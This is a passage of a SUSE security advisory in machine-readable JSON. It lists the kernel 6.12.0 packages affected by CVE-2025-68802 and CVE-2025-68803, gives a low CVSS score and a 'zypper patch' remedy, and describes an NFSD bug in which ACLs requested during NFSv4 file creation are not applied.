"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68802",
"url": "https://www.suse.com/security/cve/CVE-2025-68802"
},
{
"category": "external",
"summary": "SUSE Bug 1256661 for CVE-2025-68802",
"url": "https://bugzilla.suse.com/1256661"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "low"
}
],
"title": "CVE-2025-68802"
},
{
"cve": "CVE-2025-68803",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68803"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSD: NFSv4 file creation neglects setting ACL\n\nAn NFSv4 client that sets an ACL with a named principal during file\ncreation retrieves the ACL afterwards, and finds that it is only a\ndefault ACL (based on the mode bits) and not the ACL that was\nrequested during file creation. This violates RFC 8881 section\n6.4.1.3: \"the ACL attribute is set as given\".\n\nThe issue occurs in nfsd_create_setattr(), which calls\nnfsd_attrs_valid() to determine whether to call nfsd_setattr().\nHowever, nfsd_attrs_valid() checks only for iattr changes and\nsecurity labels, but not POSIX ACLs. When only an ACL is present,\nthe function returns false, nfsd_setattr() is skipped, and the\nPOSIX ACL is never applied to the inode.\n\nSubsequently, when the client retrieves the ACL, the server finds\nno POSIX ACL on the inode and returns one generated from the file\u0027s\nmode bits rather than returning the originally-specified ACL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
